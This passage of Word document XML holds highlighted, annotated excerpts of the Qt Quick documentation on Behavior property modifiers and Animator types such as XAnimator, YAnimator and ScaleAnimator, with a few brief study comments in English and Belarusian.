          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which are not associated with a distinct state</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="008B1DCE" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is often </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>beneficial to always animate changes to certain properties of visual items, regardless of the cause</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the change (for example, opacity effects). Qt Quick provides the</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2393" w:history="1">
        <w:r w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type which allows the client to specify animation behavior for changes to properties. The</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2394" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type is an example of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D" w:rsidRPr="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2395" w:anchor="property-modifier-types" w:history="1">
        <w:r w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property modifier</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using context and essense of Behavior</w:t>
      </w:r>
      <w:r w:rsidR="008B1DCE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2396" w:anchor="default-animation-as-behaviors" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>default property animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about using the</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2397" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type to provide default property change animations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is important to note, that using default property animations (via the</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2398" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type) </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in combination</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with state-transition animations can sometimes result in </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undefined behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurring. Please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2399" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>using Qt Quick Behaviors with States</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information about this topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2037" w:name="animators"/>
      <w:bookmarkStart w:id="2038" w:name="_Toc483000971"/>
      <w:bookmarkStart w:id="2039" w:name="_Toc483003962"/>
      <w:bookmarkStart w:id="2040" w:name="_Toc483604314"/>
      <w:bookmarkStart w:id="2041" w:name="_Toc483605534"/>
      <w:bookmarkEnd w:id="2037"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animators</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2038"/>
      <w:bookmarkEnd w:id="2039"/>
      <w:bookmarkEnd w:id="2040"/>
      <w:bookmarkEnd w:id="2041"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2400" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types are a special type of animation which </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bypass the QML objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>operate directly on the primitives in the</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D" w:rsidRPr="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2401" w:history="1">
        <w:r w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scene graph</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This has the benefit that the Animator based animations </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be run on the scene graph's rendering thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when applicable) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can continue to animate even when UI is otherwise blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1DCE" w:rsidRPr="008B1DCE" w:rsidRDefault="008B1DCE" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>// палезны клас //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick provides the following Animator types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2402" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XAnimator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates the horizontal position of an</w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2403" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2404" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>YAnimator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates the vertical position of an</w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2405" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2406" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ScaleAnimator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates the scale factor of an</w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2407" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
